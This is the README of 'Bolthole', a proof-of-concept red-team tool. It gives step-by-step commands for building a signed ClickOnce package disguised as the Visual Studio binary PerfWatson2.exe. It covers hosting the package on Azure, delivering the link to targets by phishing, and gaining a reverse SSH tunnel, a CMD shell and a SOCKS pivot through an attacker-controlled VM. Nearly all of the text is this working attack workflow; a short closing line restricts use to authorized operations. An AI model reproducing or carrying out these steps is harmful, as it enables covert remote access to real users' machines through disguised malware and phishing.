A proof-of-concept ClickOnce payload for Red Teams to establish initial access in authorized penetration tests.
Bolthole provides operators with:
- Reverse SSH tunnel into the target environment
- CMD shell access as the executing user (no password required)
- SOCKS proxy functionality for pivoting
-
Create an Azure VM (Ubuntu recommended)
-
Configure the sshd_config file:
sudo nano /etc/ssh/sshd_config
Add/modify these lines:
Port 22 Port 80 Port 443 Port 31337 AllowTcpForwarding yes GatewayPorts yes PermitRootLogin no PasswordAuthentication no PubkeyAuthentication yes -
Restart SSH service:
sudo systemctl restart sshd
-
Create a user with nologin: sudo useradd -m -s /usr/sbin/nologin clientnameuser
-
Create an SSH keypair for the target to connect back: ssh-keygen -t rsa -b 4096 -f clientnameuser_key -N ""
-
Add pub key to authorized_keys: nano /home/clientnameuser/.ssh/authorized_keys
-
Change ownership: sudo chown -R clientnameuser:clientnameuser /home/clientnameuser/
-
Copy the contents of clientnameuser_key private key to WebDeploy\Install\BoltFiles\clientnameuser_key
-
Modify the Azure VM firewall in the networking settings of the VM to allow the ports you want inbound SSH for.
- Update connection settings in the project to use your Azure VM's FQDN
- Change any ports you desire
- Modify the authorized_keys file to include your pub key 'ssh-keygen -t ecdsa -N ""'
- Copy PerfWatson2.exe "c:\program files\Microsoft Visual Studio\2022\Community\Common7\IDE\PerfWatson2.exe" to the "WebDeploy\Install" folder.
- Open Tools -> Command Line -> Developer PowerShell
- From the Bolthole directory, make the pvk: makecert.exe -sv ClickOnce.pvk -n "cn=ClickOnce" ClickOnce.cer -b 01/01/2025 -e 01/01/2026 -r
- Convert to pfx: pvk2pfx.exe -pvk ClickOnce.pvk -spc ClickOnce.cer -pfx ClickOnce.pfx
- Create Installer manifest from the WebDeploy\Install directory: mage.exe -New Application -Processor amd64 -ToFile .\Installer.exe.manifest -Name PerfWatson2 -Version 17.0.33711.286 -TrustLevel FullTrust -FromDirectory .
- Sign the manifest: mage.exe -Sign .\Installer.exe.manifest -CertFile ....\ClickOnce.pfx
- Create the application: mage.exe -New Deployment -Processor amd64 -Install false -Publisher "Digital Signatures" -AppManifest Installer.exe.manifest -ToFile Installer.application -ProviderUrl https://.azurewebsites.net/Install/Installer.application
- Sign the application: mage.exe -Sign .\Installer.application -CertFile ....\ClickOnce.pfx
- Host the ClickOnce package on a web server
- Sign in using Azure CLI: az login --use-device-code
- Fron the WebDeploy directory: az webapp up --location eastus2 --resource-group --name --html --sku F1
- Provide the link to the target (via phishing or other authorized methods)
- When executed, it will establish the reverse SSH tunnel
- Connect to your Azure VM
- Access the target machine through the established tunnel (default port 31332):
ssh -p [TUNNEL_PORT] [USERNAME]@localhost
- For SOCKS proxy:
ssh -D 1080 -p [TUNNEL_PORT] [USERNAME]@localhost
This tool is provided for authorized Red Team operations only. Usage against systems without explicit permission is illegal.